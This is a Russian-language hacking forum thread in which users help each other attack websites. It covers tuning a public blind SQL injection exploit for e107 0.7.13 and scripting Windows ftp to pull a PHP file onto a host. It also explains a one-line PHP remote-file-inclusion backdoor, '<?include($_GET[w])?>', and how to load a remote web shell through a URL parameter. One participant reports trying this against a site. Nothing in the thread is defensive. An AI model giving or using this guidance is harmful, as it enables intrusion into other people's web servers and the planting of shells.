Привет всем!
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
Вот что выдаёт:
Я так понимаю, тут написано, что нужно увеличить задержку чего-то. А чего и как - хз. И можно ли вообще это как-то увеличить?

my $benchmark = 1000000; - наверное тут надо циферьку побольше поставить

или тупо во это вырезать:

@diznt
я же тебе уже написал в прошлой теме, что так должно быть: при выполнении команды ftp пользователю предлагается ввести команды в консоли ftp. Я же писал выполни ftp /? узнаешь список команд. Если ты такой ленивый, то вот пример скачивания файла с удаленного ftp:
затем сохраняешь это в файл ftp.txt и выполняешь команду в cmd:
ftp -n -s:C:\ftp.txt
В итоге ты скачаешь файл s.php с ftp-сервера под учетной записью пользователя username с паролем password

Или используй tftp, скачивай сервер по ссылке, которую я уже давал и запускай на своем компе, указав папку с доступными для скачивания файлами.

тогда сплоит работать не будет, время задержки сервера должно быть достаточно существенным, чтобы скрипт мог отличить правильный и неправильный запрос

а что это такое

<?include($_GET[w])?>

и как это использовать???))

php.su

diznt, как сказал слип - php.su конечно же поможет .. ну а вообще - инклудь шелл и будет тебе радость

есть язык программирования php.
в нем есть код.
в этом коде можно написать include($_GET[w]) и теперь при обращении к странице site.ru/index.php?w=http://ya.ru/shell.php мы можем использовать код из файла shell.php. Инклуд нужен, чтобы встраивать в код скрипта код из другого файла. как-то так) если не понял-пиши)

AFoST неа не пашет
пишу ***.com/test.php?w=http://z0u4.narod.ru/1.php
Не помогает... (даже если выбрать хост с поддержкой php)
Помогайте)